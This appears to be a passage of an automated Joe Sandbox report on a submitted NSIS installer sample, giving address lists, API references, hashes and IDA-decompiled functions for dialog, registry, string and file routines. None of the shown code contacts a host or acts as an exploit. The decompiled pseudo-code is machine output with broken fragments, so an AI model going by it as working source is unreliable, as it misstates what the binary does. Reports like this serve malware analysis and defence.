                                                  0x73201143
                                                  0x73201218
                                                  0x7320121d
                                                  0x73201221
                                                  0x73201223
                                                  0x7320122c
                                                  0x7320122f
                                                  0x73201238
                                                  0x7320123d
                                                  0x7320123d
                                                  0x73201247
                                                  0x7320124a
                                                  0x00000000
                                                  0x73201250
                                                  0x73201149
                                                  0x7320114c
                                                  0x732011e9
                                                  0x732011ed
                                                  0x732011f7
                                                  0x732011fb
                                                  0x73201205
                                                  0x7320120a
                                                  0x73201211
                                                  0x00000000
                                                  0x73201211
                                                  0x73201152
                                                  0x73201155
                                                  0x00000000
                                                  0x00000000
                                                  0x7320115b
                                                  0x7320115e
                                                  0x732011b8
                                                  0x00000000
                                                  0x732011b8
                                                  0x73201160
                                                  0x73201162
                                                  0x7320119e
                                                  0x00000000
                                                  0x7320119e
                                                  0x00000000
                                                  0x732012a1
                                                  0x732012a1
                                                  0x732012ab
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 8e9d6198b74188a8a761a8975a2d7e813d1976f1007d74eff985ebec7286b012
                                                  • Instruction ID: 2c3be5d1e3ca0fcf937e93a925bc3b0678e5b52d9ae6a0d1861ba780c25e7681
                                                  • Opcode Fuzzy Hash: 8e9d6198b74188a8a761a8975a2d7e813d1976f1007d74eff985ebec7286b012
                                                  • Instruction Fuzzy Hash: 2451B1BAA04216DFE700DF69CA48B1A77F9FB08718B248115F949DB250F774B988DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                  				signed int _t14;
                                                  				int _t17;
                                                  				void* _t24;
                                                  				intOrPtr* _t29;
                                                  				void* _t31;
                                                  				signed int _t32;
                                                  				void* _t35;
                                                  				void* _t40;
                                                  				signed int _t42;
                                                  
                                                  				_t29 = __edi;
                                                  				_t24 = __ebx;
                                                  				_t14 =  *(_t35 - 0x28);
                                                  				_t40 = __edx - 0x38;
                                                  				 *(_t35 - 0x10) = _t14;
                                                  				_t27 = 0 | _t40 == 0x00000000;
                                                  				_t32 = _t40 == 0;
                                                  				if(_t14 == __ebx) {
                                                  					if(__edx != 0x38) {
                                                  						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                  					} else {
                                                  						E00402DA6(0x21);
                                                  						E0040655F("C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp", "C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp\System.dll", 0x400);
                                                  						_t17 = lstrlenA("C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp\System.dll");
                                                  					}
                                                  				} else {
                                                  					E00402D84(1);
                                                  					 *0x40adf0 = __ax;
                                                  					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                  				}
                                                  				 *(_t35 + 8) = _t17;
                                                  				if( *_t29 == _t24) {
                                                  					L13:
                                                  					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                  				} else {
                                                  					_t31 = E0040649D(_t27, _t29);
                                                  					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                  						_t14 = E004060DF(_t31, "C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp\System.dll",  *(_t35 + 8));
                                                  						_t42 = _t14;
                                                  						if(_t42 == 0) {
                                                  							goto L13;
                                                  						}
                                                  					} else {
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                  				return 0;
                                                  			}












                                                  0x0040263e
                                                  0x0040263e
                                                  0x0040263e
                                                  0x00402643
                                                  0x00402646
                                                  0x00402649
                                                  0x0040264e
                                                  0x00402650
                                                  0x00402670
                                                  0x004026aa
                                                  0x00402672
                                                  0x00402674
                                                  0x00402688
                                                  0x00402695
                                                  0x00402695
                                                  0x00402652
                                                  0x00402654
                                                  0x00402659
                                                  0x00402667
                                                  0x0040266a
                                                  0x004026af
                                                  0x004026b2
                                                  0x0040292e
                                                  0x0040292e
                                                  0x004026b8
                                                  0x004026c1
                                                  0x004026c3
                                                  0x004026e2
                                                  0x004015b4
                                                  0x004015b6
                                                  0x00000000
                                                  0x004015bc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004026c3
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll), ref: 00402695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll
                                                  • API String ID: 1659193697-2911177979
                                                  • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                  • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                  • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                  • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403019(intOrPtr _a4) {
                                                  				long _t2;
                                                  				struct HWND__* _t3;
                                                  				struct HWND__* _t6;
                                                  
                                                  				if(_a4 == 0) {
                                                  					if( *0x42aa20 == 0) {
                                                  						_t2 = GetTickCount();
                                                  						if(_t2 >  *0x434f0c) {
                                                  							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                  							 *0x42aa20 = _t3;
                                                  							return ShowWindow(_t3, 5);
                                                  						}
                                                  						return _t2;
                                                  					} else {
                                                  						return E00406946(0);
                                                  					}
                                                  				} else {
                                                  					_t6 =  *0x42aa20;
                                                  					if(_t6 != 0) {
                                                  						_t6 = DestroyWindow(_t6);
                                                  					}
                                                  					 *0x42aa20 = 0;
                                                  					return _t6;
                                                  				}
                                                  			}






                                                  0x00403020
                                                  0x00403040
                                                  0x0040304a
                                                  0x00403056
                                                  0x00403067
                                                  0x00403070
                                                  0x00000000
                                                  0x00403075
                                                  0x0040307c
                                                  0x00403042
                                                  0x00403049
                                                  0x00403049
                                                  0x00403022
                                                  0x00403022
                                                  0x00403029
                                                  0x0040302c
                                                  0x0040302c
                                                  0x00403032
                                                  0x00403039
                                                  0x00403039

                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                  • GetTickCount.KERNEL32 ref: 0040304A
                                                  • CreateDialogParamW.USER32 ref: 00403067
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                  • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                  • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                  • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00405F14(void* __eflags, intOrPtr _a4) {
                                                  				int _t11;
                                                  				signed char* _t12;
                                                  				intOrPtr _t18;
                                                  				intOrPtr* _t21;
                                                  				signed int _t23;
                                                  
                                                  				E0040653D(0x42fa70, _a4);
                                                  				_t21 = E00405EB7(0x42fa70);
                                                  				if(_t21 != 0) {
                                                  					E004067C4(_t21);
                                                  					if(( *0x434f18 & 0x00000080) == 0) {
                                                  						L5:
                                                  						_t23 = _t21 - 0x42fa70 >> 1;
                                                  						while(1) {
                                                  							_t11 = lstrlenW(0x42fa70);
                                                  							_push(0x42fa70);
                                                  							if(_t11 <= _t23) {
                                                  								break;
                                                  							}
                                                  							_t12 = E00406873();
                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                  								E00405E58(0x42fa70);
                                                  								continue;
                                                  							} else {
                                                  								goto L1;
                                                  							}
                                                  						}
                                                  						E00405E0C();
                                                  						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                  					}
                                                  					_t18 =  *_t21;
                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                  						goto L1;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				L1:
                                                  				return 0;
                                                  			}








                                                  0x00405f20
                                                  0x00405f2b
                                                  0x00405f2f
                                                  0x00405f36
                                                  0x00405f42
                                                  0x00405f52
                                                  0x00405f54
                                                  0x00405f6c
                                                  0x00405f6d
                                                  0x00405f74
                                                  0x00405f75
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f58
                                                  0x00405f5f
                                                  0x00405f67
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f5f
                                                  0x00405f77
                                                  0x00000000
                                                  0x00405f8b
                                                  0x00405f44
                                                  0x00405f4a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f4a
                                                  0x00405f31
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,7519FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,7519FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,7519FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,7519FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-823278215
                                                  • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                  • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                  • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                  • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				int _t15;
                                                  				long _t16;
                                                  
                                                  				_t15 = _a8;
                                                  				if(_t15 != 0x102) {
                                                  					if(_t15 != 0x200) {
                                                  						_t16 = _a16;
                                                  						L7:
                                                  						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                  							_push(_t16);
                                                  							_push(6);
                                                  							 *0x42d254 = _t16;
                                                  							E00404ED4();
                                                  						}
                                                  						L11:
                                                  						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                  					}
                                                  					if(IsWindowVisible(_a4) == 0) {
                                                  						L10:
                                                  						_t16 = _a16;
                                                  						goto L11;
                                                  					}
                                                  					_t16 = E00404E54(_a4, 1);
                                                  					_t15 = 0x419;
                                                  					goto L7;
                                                  				}
                                                  				if(_a12 != 0x20) {
                                                  					goto L10;
                                                  				}
                                                  				E004044E5(0x413);
                                                  				return 0;
                                                  			}





                                                  0x00405517
                                                  0x00405521
                                                  0x0040553d
                                                  0x0040555f
                                                  0x00405562
                                                  0x00405568
                                                  0x00405572
                                                  0x00405573
                                                  0x00405575
                                                  0x0040557b
                                                  0x0040557b
                                                  0x00405585
                                                  0x00000000
                                                  0x00405593
                                                  0x0040554a
                                                  0x00405582
                                                  0x00405582
                                                  0x00000000
                                                  0x00405582
                                                  0x00405556
                                                  0x00405558
                                                  0x00000000
                                                  0x00405558
                                                  0x00405527
                                                  0x00000000
                                                  0x00000000
                                                  0x0040552e
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405542
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                    • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                  • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                  • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                  • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                  				int _v8;
                                                  				long _t21;
                                                  				long _t24;
                                                  				char* _t30;
                                                  
                                                  				asm("sbb eax, eax");
                                                  				_v8 = 0x800;
                                                  				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                  				_t30 = _a16;
                                                  				if(_t21 != 0) {
                                                  					L4:
                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                  				} else {
                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                  					_t21 = RegCloseKey(_a20);
                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  				return _t21;
                                                  			}







                                                  0x00406419
                                                  0x0040641b
                                                  0x00406433
                                                  0x00406438
                                                  0x0040643d
                                                  0x0040647b
                                                  0x0040647b
                                                  0x0040643f
                                                  0x00406451
                                                  0x0040645c
                                                  0x00406462
                                                  0x0040646d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040646d
                                                  0x00406481

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                  • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll), ref: 0040645C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403B57() {
                                                  				void* _t2;
                                                  				void* _t3;
                                                  				void* _t6;
                                                  				void* _t8;
                                                  
                                                  				_t8 =  *0x42b22c;
                                                  				_t3 = E00403B3C(_t2, 0);
                                                  				if(_t8 != 0) {
                                                  					do {
                                                  						_t6 = _t8;
                                                  						_t8 =  *_t8;
                                                  						FreeLibrary( *(_t6 + 8));
                                                  						_t3 = GlobalFree(_t6);
                                                  					} while (_t8 != 0);
                                                  				}
                                                  				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                  				return _t3;
                                                  			}







                                                  0x00403b58
                                                  0x00403b60
                                                  0x00403b67
                                                  0x00403b6a
                                                  0x00403b6a
                                                  0x00403b6c
                                                  0x00403b71
                                                  0x00403b78
                                                  0x00403b7e
                                                  0x00403b82
                                                  0x00403b83
                                                  0x00403b8b

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,7519FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                  • GlobalFree.KERNEL32 ref: 00403B78
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-823278215
                                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                  • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                  • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                  				int _v8;
                                                  				int _t12;
                                                  				int _t14;
                                                  				int _t15;
                                                  				CHAR* _t17;
                                                  				CHAR* _t27;
                                                  
                                                  				_t12 = lstrlenA(_a8);
                                                  				_t27 = _a4;
                                                  				_v8 = _t12;
                                                  				while(lstrlenA(_t27) >= _v8) {
                                                  					_t14 = _v8;
                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                  					if(_t15 == 0) {
                                                  						_t17 = _t27;
                                                  					} else {
                                                  						_t27 = CharNextA(_t27);
                                                  						continue;
                                                  					}
                                                  					L5:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = 0;
                                                  				goto L5;
                                                  			}









                                                  0x00405fa2
                                                  0x00405fa4
                                                  0x00405fa7
                                                  0x00405fd3
                                                  0x00405fac
                                                  0x00405fb5
                                                  0x00405fba
                                                  0x00405fc5
                                                  0x00405fc8
                                                  0x00405fe4
                                                  0x00405fca
                                                  0x00405fd1
                                                  0x00000000
                                                  0x00405fd1
                                                  0x00405fdd
                                                  0x00405fe1
                                                  0x00405fe1
                                                  0x00405fdb
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                  • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                  • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                  • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%